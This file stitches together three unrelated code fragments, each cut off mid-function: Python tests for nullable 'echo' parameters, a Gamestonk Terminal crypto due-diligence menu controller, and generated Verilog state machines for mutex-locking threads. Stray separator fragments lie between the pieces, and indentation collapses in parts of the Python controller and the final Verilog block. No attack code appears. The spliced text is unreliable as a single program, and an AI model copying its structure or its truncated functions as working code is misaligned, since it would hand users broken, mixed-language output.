        command="echo_required_message_nullable_false_with_default",
        parameters={"message": None},
    )
    assert_validation_error(self, self.easy_client, request)
def test_echo_required_message_nullable_false_with_default_no_key(self):
    """Omitting the key entirely should use the non-null default instead."""
    request = self.request_generator.generate_request(
        command="echo_required_message_nullable_false_with_default",
        parameters={},
    )
    response = wait_for_response(self.easy_client, request)
    assert_successful_request(response, output="cannot be null")
def test_echo_required_message_nullable_true(self):
    """A required but nullable parameter accepts an explicit null."""
    request = self.request_generator.generate_request(
        command="echo_required_message_nullable_true",
        parameters={"message": None},
    )
    response = wait_for_response(self.easy_client, request)
    assert_successful_request(response, output="null")
def test_echo_required_message_nullable_true_with_default(self):
    """An explicit null wins over a non-null default when nullable."""
    request = self.request_generator.generate_request(
        command="echo_required_message_nullable_true_with_non_null_default",
        parameters={"message": None},
    )
    response = wait_for_response(self.easy_client, request)
    assert_successful_request(response, output="null")
def test_echo_required_message_nullable_true_with_default_no_key(self):
request = self.request_generator.generate_request(
command="echo_required_message_nullable_true_with_non_null_default",
parameters={}
)
response = wait_for_response(self.easy_client, | |
<gh_stars>1-10
"""Cryptocurrency Due diligence Controller"""
__docformat__ = "numpy"
# pylint: disable=R0904, C0302, W0622
import argparse
import os
import pandas as pd
from binance.client import Client
from prompt_toolkit.completion import NestedCompleter
from gamestonk_terminal import feature_flags as gtff
from gamestonk_terminal.menu import session
from gamestonk_terminal.cryptocurrency.due_diligence import (
pycoingecko_view,
coinpaprika_view,
binance_view,
coinbase_model,
binance_model,
coinbase_view,
)
from gamestonk_terminal.helper_funcs import (
get_flair,
parse_known_args_and_warn,
check_positive,
)
from gamestonk_terminal.cryptocurrency.due_diligence.coinpaprika_view import CURRENCIES
from gamestonk_terminal.cryptocurrency.cryptocurrency_helpers import plot_chart
import gamestonk_terminal.config_terminal as cfg
class DueDiligenceController:
    """Controller for the cryptocurrency due-diligence menu.

    Dispatches user commands to the view module matching the selected data
    source: "cg" (CoinGecko), "cp" (CoinPaprika), "bin" (Binance) or
    "cb" (Coinbase).
    """

    # Commands available regardless of the selected data source.
    CHOICES = [
        "?",
        "cls",
        "help",
        "q",
        "quit",
        "chart",
    ]

    # Extra commands that are only valid for a particular data source.
    SPECIFIC_CHOICES = {
        "cp": [
            "events",
            "twitter",
            "ex",
            "mkt",
            "ps",
            "basic",
        ],
        "cg": [
            "info",
            "market",
            "ath",
            "atl",
            "score",
            "web",
            "social",
            "bc",
            "dev",
        ],
        "bin": [
            "book",
            "balance",
        ],
        "cb": ["book", "trades", "stats"],
    }

    # Source identifier -> view module used to render that source's data.
    DD_VIEWS_MAPPING = {
        "cg": pycoingecko_view,
        "cp": coinpaprika_view,
        "bin": binance_view,
    }
def __init__(self, coin=None, source=None):
    """Initialize the controller for one coin/source pair.

    :param coin: the currently loaded coin object (or None)
    :param source: data-source key ("cg", "cp", "bin" or "cb") used to
        select the source-specific command set
    """
    self._dd_parser = argparse.ArgumentParser(add_help=False, prog="dd")
    self.current_coin = coin
    self.current_currency = None
    self.current_df = pd.DataFrame()
    self.source = source
    # BUG FIX: the original called ``self.CHOICES.extend(...)``, which
    # mutates the *class-level* list shared by all instances, so commands
    # accumulated (and duplicated) across controller instantiations.
    # Building a new per-instance list keeps the class attribute pristine.
    self.CHOICES = self.CHOICES + self.SPECIFIC_CHOICES[self.source]
    self._dd_parser.add_argument("cmd", choices=self.CHOICES)
def print_help(self):
    """Print the due-diligence help menu.

    The base menu is always shown; a source-specific section is appended
    for whichever of "cp"/"cg"/"bin"/"cb" is the active source.
    """
    # Base section, shown for every data source.
    help_text = """
Due Diligence:
    cls         clear screen
    ?/help      show this menu again
    q           quit this menu, and shows back to main menu
    quit        quit to abandon the program
"""
    if self.source == "cp":
        help_text += """
CoinPaprika:
    basic           basic information about loaded coin
    ps              price and supply related metrics for loaded coin
    mkt             all markets for loaded coin
    ex              all exchanges where loaded coin is listed
    twitter         tweets for loaded coin
    events          events related to loaded coin
"""
    if self.source == "cg":
        help_text += """
CoinGecko:
    info            basic information about loaded coin
    market          market stats about loaded coin
    ath             all time high related stats for loaded coin
    atl             all time low related stats for loaded coin
    web             found websites for loaded coin e.g forum, homepage
    social          social portals urls for loaded coin, e.g reddit, twitter
    score           different kind of scores for loaded coin, e.g developer score, sentiment score
    dev             github, bitbucket coin development statistics
    bc              links to blockchain explorers for loaded coin
"""
    if self.source == "bin":
        help_text += """
Binance:
    book            show order book
    balance         show coin balance
"""
    if self.source == "cb":
        help_text += """
Coinbase:
    book            show order book
    trades          show last trades
    stats           show coin stats
"""
    # "chart" is common to all sources, so it is appended last.
    help_text += "    chart           display chart\n"
    print(help_text)
def switch(self, an_input: str):
    """Process and dispatch a single menu command.

    Returns
    -------
    True, False or None
        False - quit the menu
        True - quit the program
        None - continue in the menu
    """
    # Empty command: just echo a blank line and stay in the menu.
    if not an_input:
        print("")
        return None

    (known_args, other_args) = self._dd_parser.parse_known_args(an_input.split())

    # Help menu again
    if known_args.cmd == "?":
        self.print_help()
        return None

    # Clear screen (portable across Windows and POSIX shells)
    if known_args.cmd == "cls":
        os.system("cls||clear")
        return None

    # BUG FIX: the fallback used to be a zero-argument lambda, which would
    # raise TypeError when invoked with ``other_args`` below. Accept (and
    # ignore) the argument so an unrecognized command degrades gracefully.
    return getattr(
        self, "call_" + known_args.cmd, lambda _: "Command not recognized!"
    )(other_args)
def call_help(self, _):
    """Show the help menu again."""
    self.print_help()
def call_q(self, _):
    """Leave this menu and return to the parent (crypto) menu."""
    print("Moving back to (crypto) menu")
    return False
def call_quit(self, _):
    """Abandon the whole program."""
    return True
def call_info(self, other_args):
    """Show basic information about the loaded coin (CoinGecko)."""
    if not self.current_coin:
        print(
            "No coin selected. Use 'load' to load the coin you want to look at.\n"
        )
        return

    parser = argparse.ArgumentParser(
        add_help=False,
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
        prog="info",
        description="""
            Shows basic information about loaded coin like:
            Name, Symbol, Description, Market Cap, Public Interest, Supply, and Price related metrics
            """,
    )
    parser.add_argument(
        "--export",
        choices=["csv", "json", "xlsx"],
        default="",
        type=str,
        dest="export",
        help="Export dataframe data to csv,json,xlsx file",
    )

    try:
        ns_parser = parse_known_args_and_warn(parser, other_args)
        if not ns_parser:
            return
        pycoingecko_view.display_info(
            coin=self.current_coin, export=ns_parser.export
        )
    except Exception as exc:
        print(exc, "\n")
def call_market(self, other_args):
    """Show market stats for the loaded coin (CoinGecko)."""
    if not self.current_coin:
        print(
            "No coin selected. Use 'load' to load the coin you want to look at.\n"
        )
        return

    parser = argparse.ArgumentParser(
        add_help=False,
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
        prog="market",
        description="""
            Market data for loaded coin. There you find metrics like:
            Market Cap, Supply, Circulating Supply, Price, Volume and many others.
            """,
    )
    parser.add_argument(
        "--export",
        choices=["csv", "json", "xlsx"],
        default="",
        type=str,
        dest="export",
        help="Export dataframe data to csv,json,xlsx file",
    )

    try:
        ns_parser = parse_known_args_and_warn(parser, other_args)
        if not ns_parser:
            return
        pycoingecko_view.display_market(self.current_coin, ns_parser.export)
    except Exception as exc:
        print(exc, "\n")
def call_web(self, other_args):
    """Show websites associated with the loaded coin (CoinGecko)."""
    if not self.current_coin:
        print(
            "No coin selected. Use 'load' to load the coin you want to look at.\n"
        )
        return

    parser = argparse.ArgumentParser(
        add_help=False,
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
        prog="web",
        description="""Websites found for given Coin. You can find there urls to
            homepage, forum, announcement site and others.""",
    )
    parser.add_argument(
        "--export",
        choices=["csv", "json", "xlsx"],
        default="",
        type=str,
        dest="export",
        help="Export dataframe data to csv,json,xlsx file",
    )

    try:
        ns_parser = parse_known_args_and_warn(parser, other_args)
        if not ns_parser:
            return
        pycoingecko_view.display_web(self.current_coin, export=ns_parser.export)
    except Exception as exc:
        print(exc, "\n")
def call_social(self, other_args):
    """Show social-media links for the loaded coin (CoinGecko)."""
    if not self.current_coin:
        print(
            "No coin selected. Use 'load' to load the coin you want to look at.\n"
        )
        return

    parser = argparse.ArgumentParser(
        add_help=False,
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
        prog="social",
        description="""Shows social media corresponding to loaded coin. You can find there name of
            telegram channel, urls to twitter, reddit, bitcointalk, facebook and discord.""",
    )
    parser.add_argument(
        "--export",
        choices=["csv", "json", "xlsx"],
        default="",
        type=str,
        dest="export",
        help="Export dataframe data to csv,json,xlsx file",
    )

    try:
        ns_parser = parse_known_args_and_warn(parser, other_args)
        if not ns_parser:
            return
        pycoingecko_view.display_social(
            self.current_coin, export=ns_parser.export
        )
    except Exception as exc:
        print(exc, "\n")
def call_dev(self, other_args):
    """Show code-development statistics for the loaded coin (CoinGecko)."""
    if not self.current_coin:
        print(
            "No coin selected. Use 'load' to load the coin you want to look at.\n"
        )
        return

    parser = argparse.ArgumentParser(
        add_help=False,
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
        prog="dev",
        description="""
            Developers data for loaded coin. If the development data is available you can see
            how the code development of given coin is going on.
            There are some statistics that shows number of stars, forks, subscribers, pull requests,
            commits, merges, contributors on github.""",
    )
    parser.add_argument(
        "--export",
        choices=["csv", "json", "xlsx"],
        default="",
        type=str,
        dest="export",
        help="Export dataframe data to csv,json,xlsx file",
    )

    try:
        ns_parser = parse_known_args_and_warn(parser, other_args)
        if not ns_parser:
            return
        pycoingecko_view.display_dev(self.current_coin, ns_parser.export)
    except Exception as exc:
        print(exc, "\n")
def call_ath(self, other_args):
    """Show all-time-high stats for the loaded coin (CoinGecko)."""
    if not self.current_coin:
        print(
            "No coin selected. Use 'load' to load the coin you want to look at.\n"
        )
        return

    parser = argparse.ArgumentParser(
        add_help=False,
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
        prog="ath",
        description="""All time high data for loaded coin""",
    )
    parser.add_argument(
        "--export",
        choices=["csv", "json", "xlsx"],
        default="",
        type=str,
        dest="export",
        help="Export dataframe data to csv,json,xlsx file",
    )
    parser.add_argument(
        "--vs",
        dest="vs",
        help="currency",
        default="usd",
        choices=["usd", "btc"],
    )

    try:
        ns_parser = parse_known_args_and_warn(parser, other_args)
        if not ns_parser:
            return
        pycoingecko_view.display_ath(
            self.current_coin, ns_parser.vs, ns_parser.export
        )
    except Exception as exc:
        print(exc, "\n")
def call_atl(self, other_args):
    """Show all-time-low stats for the loaded coin (CoinGecko)."""
    if not self.current_coin:
        print(
            "No coin selected. Use 'load' to load the coin you want to look at.\n"
        )
        return

    parser = argparse.ArgumentParser(
        add_help=False,
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
        prog="atl",
        description="""All time low data for loaded coin""",
    )
    # NOTE: --vs is declared before --export here (mirrors the original
    # argument order, which affects the generated --help listing).
    parser.add_argument(
        "--vs",
        dest="vs",
        help="currency",
        default="usd",
        choices=["usd", "btc"],
    )
    parser.add_argument(
        "--export",
        choices=["csv", "json", "xlsx"],
        default="",
        type=str,
        dest="export",
        help="Export dataframe data to csv,json,xlsx file",
    )

    try:
        ns_parser = parse_known_args_and_warn(parser, other_args)
        if not ns_parser:
            return
        pycoingecko_view.display_atl(
            self.current_coin, ns_parser.vs, ns_parser.export
        )
    except Exception as exc:
        print(exc, "\n")
def call_score(self, other_args):
    """Show ranking/sentiment scores for the loaded coin (CoinGecko)."""
    if not self.current_coin:
        print(
            "No coin selected. Use 'load' to load the coin you want to look at.\n"
        )
        return

    parser = argparse.ArgumentParser(
        add_help=False,
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
        prog="score",
        description="""
            In this view you can find different kind of scores for loaded coin.
            Those scores represents different rankings, sentiment metrics, some user stats and others.
            You will see CoinGecko scores, Developer Scores, Community Scores, Sentiment, Reddit scores
            and many others.
            """,
    )
    parser.add_argument(
        "--export",
        choices=["csv", "json", "xlsx"],
        default="",
        type=str,
        dest="export",
        help="Export dataframe data to csv,json,xlsx file",
    )

    try:
        ns_parser = parse_known_args_and_warn(parser, other_args)
        if not ns_parser:
            return
        pycoingecko_view.display_score(self.current_coin, ns_parser.export)
    except Exception as exc:
        print(exc, "\n")
def call_bc(self, other_args):
    """Show blockchain-explorer URLs for the loaded coin (CoinGecko)."""
    if not self.current_coin:
        print(
            "No coin selected. Use 'load' to load the coin you want to look at.\n"
        )
        return

    parser = argparse.ArgumentParser(
        add_help=False,
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
        prog="bc",
        description="""
            Blockchain explorers URLs for loaded coin. Those are sites like etherescan.io or polkascan.io
            in which you can see all blockchain data e.g. all txs, all tokens, all contracts...
            """,
    )
    parser.add_argument(
        "--export",
        choices=["csv", "json", "xlsx"],
        default="",
        type=str,
        dest="export",
        help="Export dataframe data to csv,json,xlsx file",
    )

    try:
        ns_parser = parse_known_args_and_warn(parser, other_args)
        if not ns_parser:
            return
        pycoingecko_view.display_bc(self.current_coin, ns_parser.export)
    except Exception as exc:
        print(exc, "\n")
# binance
def call_book(self, other_args):
"""Process book command"""
if self.current_coin:
parser = argparse.ArgumentParser(
prog="book",
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description="Get the order | |
begin
th_myfunc_4 <= th_myfunc_4_1;
end
end
th_myfunc_4_1: begin
_th_myfunc_4_tid_22 <= _th_myfunc_4_tid_21;
th_myfunc_4 <= th_myfunc_4_2;
end
th_myfunc_4_2: begin
$display("-- Thread %d TryLock", _th_myfunc_4_tid_22);
th_myfunc_4 <= th_myfunc_4_3;
end
th_myfunc_4_3: begin
th_myfunc_4 <= th_myfunc_4_4;
end
th_myfunc_4_4: begin
_tmp_8 <= _mymutex_lock_reg & (_mymutex_lock_id == 4);
th_myfunc_4 <= th_myfunc_4_5;
end
th_myfunc_4_5: begin
_th_myfunc_4_lock_23 <= _tmp_8;
th_myfunc_4 <= th_myfunc_4_6;
end
th_myfunc_4_6: begin
_th_myfunc_4_waitcount_24 <= 0;
th_myfunc_4 <= th_myfunc_4_7;
end
th_myfunc_4_7: begin
if(!_th_myfunc_4_lock_23) begin
th_myfunc_4 <= th_myfunc_4_8;
end else begin
th_myfunc_4 <= th_myfunc_4_14;
end
end
th_myfunc_4_8: begin
$display("-- Thread %d TryLock", _th_myfunc_4_tid_22);
th_myfunc_4 <= th_myfunc_4_9;
end
th_myfunc_4_9: begin
_th_myfunc_4_waitcount_24 <= _th_myfunc_4_waitcount_24 + 1;
th_myfunc_4 <= th_myfunc_4_10;
end
th_myfunc_4_10: begin
th_myfunc_4 <= th_myfunc_4_11;
end
th_myfunc_4_11: begin
_tmp_9 <= _mymutex_lock_reg & (_mymutex_lock_id == 4);
th_myfunc_4 <= th_myfunc_4_12;
end
th_myfunc_4_12: begin
_th_myfunc_4_lock_23 <= _tmp_9;
th_myfunc_4 <= th_myfunc_4_13;
end
th_myfunc_4_13: begin
th_myfunc_4 <= th_myfunc_4_7;
end
th_myfunc_4_14: begin
$display("Thread %d Lock: waitcount=%d", _th_myfunc_4_tid_22, _th_myfunc_4_waitcount_24);
th_myfunc_4 <= th_myfunc_4_15;
end
th_myfunc_4_15: begin
_th_myfunc_4_i_25 <= 0;
th_myfunc_4 <= th_myfunc_4_16;
end
th_myfunc_4_16: begin
if(_th_myfunc_4_i_25 < 20) begin
th_myfunc_4 <= th_myfunc_4_17;
end else begin
th_myfunc_4 <= th_myfunc_4_18;
end
end
th_myfunc_4_17: begin
_th_myfunc_4_i_25 <= _th_myfunc_4_i_25 + 1;
th_myfunc_4 <= th_myfunc_4_16;
end
th_myfunc_4_18: begin
$display("Thread %d Hello", _th_myfunc_4_tid_22);
th_myfunc_4 <= th_myfunc_4_19;
end
th_myfunc_4_19: begin
th_myfunc_4 <= th_myfunc_4_20;
end
th_myfunc_4_20: begin
$display("Thread %d Unlock", _th_myfunc_4_tid_22);
th_myfunc_4 <= th_myfunc_4_21;
end
endcase
end
end
// State encodings for the generated thread FSM "th_myfunc_5" (states 1-21).
localparam th_myfunc_5_1 = 1;
localparam th_myfunc_5_2 = 2;
localparam th_myfunc_5_3 = 3;
localparam th_myfunc_5_4 = 4;
localparam th_myfunc_5_5 = 5;
localparam th_myfunc_5_6 = 6;
localparam th_myfunc_5_7 = 7;
localparam th_myfunc_5_8 = 8;
localparam th_myfunc_5_9 = 9;
localparam th_myfunc_5_10 = 10;
localparam th_myfunc_5_11 = 11;
localparam th_myfunc_5_12 = 12;
localparam th_myfunc_5_13 = 13;
localparam th_myfunc_5_14 = 14;
localparam th_myfunc_5_15 = 15;
localparam th_myfunc_5_16 = 16;
localparam th_myfunc_5_17 = 17;
localparam th_myfunc_5_18 = 18;
localparam th_myfunc_5_19 = 19;
localparam th_myfunc_5_20 = 20;
localparam th_myfunc_5_21 = 21;

// Thread FSM th_myfunc_5 (auto-generated; same pattern as sibling threads):
//   init   : wait until th_blink (state 4) raises _th_myfunc_start[5],
//            then latch the thread id from _th_blink_tid_0
//   1-5    : announce "TryLock" and sample whether this FSM holds the
//            mutex (_mymutex_lock_reg asserted with _mymutex_lock_id == 5)
//   6-13   : poll loop - keep re-sampling the lock, counting attempts in
//            _th_myfunc_5_waitcount_29, until the lock flag is set
//   14     : report how many polling iterations the lock took
//   15-17  : 20-iteration busy-wait loop (the "work" in the critical section)
//   18-20  : print greeting, then announce "Unlock"
//   21     : no case arm -> FSM parks here after completion
// NOTE(review): the mutex grant/release logic itself appears to live in a
// separate arbiter block outside this view - confirm against full source.
always @(posedge CLK) begin
  if(RST) begin
    th_myfunc_5 <= th_myfunc_5_init;
    _th_myfunc_5_called <= 0;
    _th_myfunc_5_tid_26 <= 0;
    _th_myfunc_5_tid_27 <= 0;
    _tmp_10 <= 0;
    _th_myfunc_5_lock_28 <= 0;
    _th_myfunc_5_waitcount_29 <= 0;
    _tmp_11 <= 0;
    _th_myfunc_5_i_30 <= 0;
  end else begin
    case(th_myfunc_5)
      th_myfunc_5_init: begin
        // Start handshake: triggered by the th_blink controller FSM.
        if(_th_myfunc_start[5] && (th_blink == 4)) begin
          _th_myfunc_5_called <= 1;
        end
        if(_th_myfunc_start[5] && (th_blink == 4)) begin
          _th_myfunc_5_tid_26 <= _th_blink_tid_0;
        end
        if((th_blink == 4) && _th_myfunc_start[5]) begin
          th_myfunc_5 <= th_myfunc_5_1;
        end
      end
      th_myfunc_5_1: begin
        _th_myfunc_5_tid_27 <= _th_myfunc_5_tid_26;
        th_myfunc_5 <= th_myfunc_5_2;
      end
      th_myfunc_5_2: begin
        $display("-- Thread %d TryLock", _th_myfunc_5_tid_27);
        th_myfunc_5 <= th_myfunc_5_3;
      end
      th_myfunc_5_3: begin
        th_myfunc_5 <= th_myfunc_5_4;
      end
      th_myfunc_5_4: begin
        // Sample the lock: held by us iff the shared lock register is set
        // and the arbiter granted it to lock id 5.
        _tmp_10 <= _mymutex_lock_reg & (_mymutex_lock_id == 5);
        th_myfunc_5 <= th_myfunc_5_5;
      end
      th_myfunc_5_5: begin
        _th_myfunc_5_lock_28 <= _tmp_10;
        th_myfunc_5 <= th_myfunc_5_6;
      end
      th_myfunc_5_6: begin
        _th_myfunc_5_waitcount_29 <= 0;
        th_myfunc_5 <= th_myfunc_5_7;
      end
      th_myfunc_5_7: begin
        // Loop head: retry (state 8) until the lock is observed held.
        if(!_th_myfunc_5_lock_28) begin
          th_myfunc_5 <= th_myfunc_5_8;
        end else begin
          th_myfunc_5 <= th_myfunc_5_14;
        end
      end
      th_myfunc_5_8: begin
        $display("-- Thread %d TryLock", _th_myfunc_5_tid_27);
        th_myfunc_5 <= th_myfunc_5_9;
      end
      th_myfunc_5_9: begin
        _th_myfunc_5_waitcount_29 <= _th_myfunc_5_waitcount_29 + 1;
        th_myfunc_5 <= th_myfunc_5_10;
      end
      th_myfunc_5_10: begin
        th_myfunc_5 <= th_myfunc_5_11;
      end
      th_myfunc_5_11: begin
        _tmp_11 <= _mymutex_lock_reg & (_mymutex_lock_id == 5);
        th_myfunc_5 <= th_myfunc_5_12;
      end
      th_myfunc_5_12: begin
        _th_myfunc_5_lock_28 <= _tmp_11;
        th_myfunc_5 <= th_myfunc_5_13;
      end
      th_myfunc_5_13: begin
        th_myfunc_5 <= th_myfunc_5_7;
      end
      th_myfunc_5_14: begin
        $display("Thread %d Lock: waitcount=%d", _th_myfunc_5_tid_27, _th_myfunc_5_waitcount_29);
        th_myfunc_5 <= th_myfunc_5_15;
      end
      th_myfunc_5_15: begin
        _th_myfunc_5_i_30 <= 0;
        th_myfunc_5 <= th_myfunc_5_16;
      end
      th_myfunc_5_16: begin
        // Busy-wait loop: 20 iterations inside the critical section.
        if(_th_myfunc_5_i_30 < 20) begin
          th_myfunc_5 <= th_myfunc_5_17;
        end else begin
          th_myfunc_5 <= th_myfunc_5_18;
        end
      end
      th_myfunc_5_17: begin
        _th_myfunc_5_i_30 <= _th_myfunc_5_i_30 + 1;
        th_myfunc_5 <= th_myfunc_5_16;
      end
      th_myfunc_5_18: begin
        $display("Thread %d Hello", _th_myfunc_5_tid_27);
        th_myfunc_5 <= th_myfunc_5_19;
      end
      th_myfunc_5_19: begin
        th_myfunc_5 <= th_myfunc_5_20;
      end
      th_myfunc_5_20: begin
        $display("Thread %d Unlock", _th_myfunc_5_tid_27);
        th_myfunc_5 <= th_myfunc_5_21;
      end
    endcase
  end
end
// State encodings for the generated thread FSM "th_myfunc_6" (states 1-21).
localparam th_myfunc_6_1 = 1;
localparam th_myfunc_6_2 = 2;
localparam th_myfunc_6_3 = 3;
localparam th_myfunc_6_4 = 4;
localparam th_myfunc_6_5 = 5;
localparam th_myfunc_6_6 = 6;
localparam th_myfunc_6_7 = 7;
localparam th_myfunc_6_8 = 8;
localparam th_myfunc_6_9 = 9;
localparam th_myfunc_6_10 = 10;
localparam th_myfunc_6_11 = 11;
localparam th_myfunc_6_12 = 12;
localparam th_myfunc_6_13 = 13;
localparam th_myfunc_6_14 = 14;
localparam th_myfunc_6_15 = 15;
localparam th_myfunc_6_16 = 16;
localparam th_myfunc_6_17 = 17;
localparam th_myfunc_6_18 = 18;
localparam th_myfunc_6_19 = 19;
localparam th_myfunc_6_20 = 20;
localparam th_myfunc_6_21 = 21;

// Thread FSM th_myfunc_6: identical generated structure to th_myfunc_5,
// parameterized for lock id 6 / start bit _th_myfunc_start[6]:
//   init -> latch tid; 2-5 try-lock sample; 6-13 poll-with-waitcount loop;
//   14 report waitcount; 15-17 busy-wait 20 cycles; 18-20 greet + announce
//   Unlock; 21 has no case arm (FSM parks when done).
always @(posedge CLK) begin
  if(RST) begin
    th_myfunc_6 <= th_myfunc_6_init;
    _th_myfunc_6_called <= 0;
    _th_myfunc_6_tid_31 <= 0;
    _th_myfunc_6_tid_32 <= 0;
    _tmp_12 <= 0;
    _th_myfunc_6_lock_33 <= 0;
    _th_myfunc_6_waitcount_34 <= 0;
    _tmp_13 <= 0;
    _th_myfunc_6_i_35 <= 0;
  end else begin
    case(th_myfunc_6)
      th_myfunc_6_init: begin
        // Start handshake from the th_blink controller FSM.
        if(_th_myfunc_start[6] && (th_blink == 4)) begin
          _th_myfunc_6_called <= 1;
        end
        if(_th_myfunc_start[6] && (th_blink == 4)) begin
          _th_myfunc_6_tid_31 <= _th_blink_tid_0;
        end
        if((th_blink == 4) && _th_myfunc_start[6]) begin
          th_myfunc_6 <= th_myfunc_6_1;
        end
      end
      th_myfunc_6_1: begin
        _th_myfunc_6_tid_32 <= _th_myfunc_6_tid_31;
        th_myfunc_6 <= th_myfunc_6_2;
      end
      th_myfunc_6_2: begin
        $display("-- Thread %d TryLock", _th_myfunc_6_tid_32);
        th_myfunc_6 <= th_myfunc_6_3;
      end
      th_myfunc_6_3: begin
        th_myfunc_6 <= th_myfunc_6_4;
      end
      th_myfunc_6_4: begin
        // Lock is held by this FSM iff granted to lock id 6.
        _tmp_12 <= _mymutex_lock_reg & (_mymutex_lock_id == 6);
        th_myfunc_6 <= th_myfunc_6_5;
      end
      th_myfunc_6_5: begin
        _th_myfunc_6_lock_33 <= _tmp_12;
        th_myfunc_6 <= th_myfunc_6_6;
      end
      th_myfunc_6_6: begin
        _th_myfunc_6_waitcount_34 <= 0;
        th_myfunc_6 <= th_myfunc_6_7;
      end
      th_myfunc_6_7: begin
        // Loop head: retry (state 8) until the lock is observed held.
        if(!_th_myfunc_6_lock_33) begin
          th_myfunc_6 <= th_myfunc_6_8;
        end else begin
          th_myfunc_6 <= th_myfunc_6_14;
        end
      end
      th_myfunc_6_8: begin
        $display("-- Thread %d TryLock", _th_myfunc_6_tid_32);
        th_myfunc_6 <= th_myfunc_6_9;
      end
      th_myfunc_6_9: begin
        _th_myfunc_6_waitcount_34 <= _th_myfunc_6_waitcount_34 + 1;
        th_myfunc_6 <= th_myfunc_6_10;
      end
      th_myfunc_6_10: begin
        th_myfunc_6 <= th_myfunc_6_11;
      end
      th_myfunc_6_11: begin
        _tmp_13 <= _mymutex_lock_reg & (_mymutex_lock_id == 6);
        th_myfunc_6 <= th_myfunc_6_12;
      end
      th_myfunc_6_12: begin
        _th_myfunc_6_lock_33 <= _tmp_13;
        th_myfunc_6 <= th_myfunc_6_13;
      end
      th_myfunc_6_13: begin
        th_myfunc_6 <= th_myfunc_6_7;
      end
      th_myfunc_6_14: begin
        $display("Thread %d Lock: waitcount=%d", _th_myfunc_6_tid_32, _th_myfunc_6_waitcount_34);
        th_myfunc_6 <= th_myfunc_6_15;
      end
      th_myfunc_6_15: begin
        _th_myfunc_6_i_35 <= 0;
        th_myfunc_6 <= th_myfunc_6_16;
      end
      th_myfunc_6_16: begin
        // Busy-wait loop: 20 iterations inside the critical section.
        if(_th_myfunc_6_i_35 < 20) begin
          th_myfunc_6 <= th_myfunc_6_17;
        end else begin
          th_myfunc_6 <= th_myfunc_6_18;
        end
      end
      th_myfunc_6_17: begin
        _th_myfunc_6_i_35 <= _th_myfunc_6_i_35 + 1;
        th_myfunc_6 <= th_myfunc_6_16;
      end
      th_myfunc_6_18: begin
        $display("Thread %d Hello", _th_myfunc_6_tid_32);
        th_myfunc_6 <= th_myfunc_6_19;
      end
      th_myfunc_6_19: begin
        th_myfunc_6 <= th_myfunc_6_20;
      end
      th_myfunc_6_20: begin
        $display("Thread %d Unlock", _th_myfunc_6_tid_32);
        th_myfunc_6 <= th_myfunc_6_21;
      end
    endcase
  end
end
// State encodings for the generated thread FSM "th_myfunc_7" (states 1-21);
// the FSM body follows the same try-lock/busy-wait template as its siblings.
localparam th_myfunc_7_1 = 1;
localparam th_myfunc_7_2 = 2;
localparam th_myfunc_7_3 = 3;
localparam th_myfunc_7_4 = 4;
localparam th_myfunc_7_5 = 5;
localparam th_myfunc_7_6 = 6;
localparam th_myfunc_7_7 = 7;
localparam th_myfunc_7_8 = 8;
localparam th_myfunc_7_9 = 9;
localparam th_myfunc_7_10 = 10;
localparam th_myfunc_7_11 = 11;
localparam th_myfunc_7_12 = 12;
localparam th_myfunc_7_13 = 13;
localparam th_myfunc_7_14 = 14;
localparam th_myfunc_7_15 = 15;
localparam th_myfunc_7_16 = 16;
localparam th_myfunc_7_17 = 17;
localparam th_myfunc_7_18 = 18;
localparam th_myfunc_7_19 = 19;
localparam th_myfunc_7_20 = 20;
localparam th_myfunc_7_21 = 21;
always @(posedge CLK) begin
if(RST) begin
th_myfunc_7 <= th_myfunc_7_init;
_th_myfunc_7_called <= 0;
_th_myfunc_7_tid_36 <= 0;
_th_myfunc_7_tid_37 <= 0;
_tmp_14 <= 0;
_th_myfunc_7_lock_38 <= 0;
_th_myfunc_7_waitcount_39 <= 0;
_tmp_15 <= 0;
_th_myfunc_7_i_40 <= 0;
end else begin
case(th_myfunc_7)
th_myfunc_7_init: begin
if(_th_myfunc_start[7] && (th_blink == 4)) begin
_th_myfunc_7_called <= 1;
end
if(_th_myfunc_start[7] && (th_blink == 4)) begin
_th_myfunc_7_tid_36 <= _th_blink_tid_0;
end
if((th_blink == 4) && _th_myfunc_start[7]) begin
th_myfunc_7 <= th_myfunc_7_1;
end
end
th_myfunc_7_1: begin
_th_myfunc_7_tid_37 <= _th_myfunc_7_tid_36;
th_myfunc_7 <= th_myfunc_7_2;
end
th_myfunc_7_2: begin
$display("-- Thread %d TryLock", _th_myfunc_7_tid_37);
th_myfunc_7 <= th_myfunc_7_3;
end
th_myfunc_7_3: begin
th_myfunc_7 <= th_myfunc_7_4;
end
th_myfunc_7_4: begin
_tmp_14 <= _mymutex_lock_reg & (_mymutex_lock_id == 7);
th_myfunc_7 <= th_myfunc_7_5;
end
th_myfunc_7_5: begin
_th_myfunc_7_lock_38 <= _tmp_14;
th_myfunc_7 <= th_myfunc_7_6;
end
th_myfunc_7_6: begin
_th_myfunc_7_waitcount_39 <= 0;
th_myfunc_7 <= th_myfunc_7_7;
end
th_myfunc_7_7: begin
if(!_th_myfunc_7_lock_38) begin
th_myfunc_7 <= th_myfunc_7_8;
end else begin
th_myfunc_7 <= th_myfunc_7_14;
end
end
th_myfunc_7_8: begin
$display("-- Thread %d TryLock", _th_myfunc_7_tid_37);
th_myfunc_7 <= th_myfunc_7_9;
end
th_myfunc_7_9: begin
_th_myfunc_7_waitcount_39 <= _th_myfunc_7_waitcount_39 + 1;
th_myfunc_7 <= th_myfunc_7_10;
end
th_myfunc_7_10: begin
th_myfunc_7 <= th_myfunc_7_11;
end
th_myfunc_7_11: begin
_tmp_15 <= _mymutex_lock_reg & (_mymutex_lock_id == 7);
th_myfunc_7 <= th_myfunc_7_12;
end
th_myfunc_7_12: begin
_th_myfunc_7_lock_38 <= _tmp_15;
th_myfunc_7 <= th_myfunc_7_13;
end
th_myfunc_7_13: begin
th_myfunc_7 <= th_myfunc_7_7;
end
th_myfunc_7_14: begin
$display("Thread %d Lock: waitcount=%d", _th_myfunc_7_tid_37, _th_myfunc_7_waitcount_39);
